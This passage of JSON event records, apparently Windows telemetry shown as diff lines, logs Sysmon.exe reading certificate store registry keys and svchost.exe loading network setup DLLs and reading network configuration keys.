"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "NetSetupSvc.dll", - "image_path": "C:\\Windows\\System32\\NetSetupSvc.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\State", - "registry_value": "State", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupEngine.dll", - "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794180000, - 
"unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794180000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", - "registry_value": "Interfaces", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": 
"HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": 
"HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ImplatSetup.dll", - "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupEngine.dll", - "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - 
"event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System", - "registry_path": "HKLM\\System\\CurrentControlSet", - "registry_value": "CurrentControlSet", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ImplatSetup.dll", - "image_path": "C:\\Windows\\System32\\ImplatSetup.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\NetworkSetup2\\Interfaces", - "registry_value": "Interfaces", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0000", - "registry_value": "0000", - "timestamp": 131883573794330000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0001", - "registry_value": "0001", - "timestamp": 131883573794330000, - "unique_pid": 
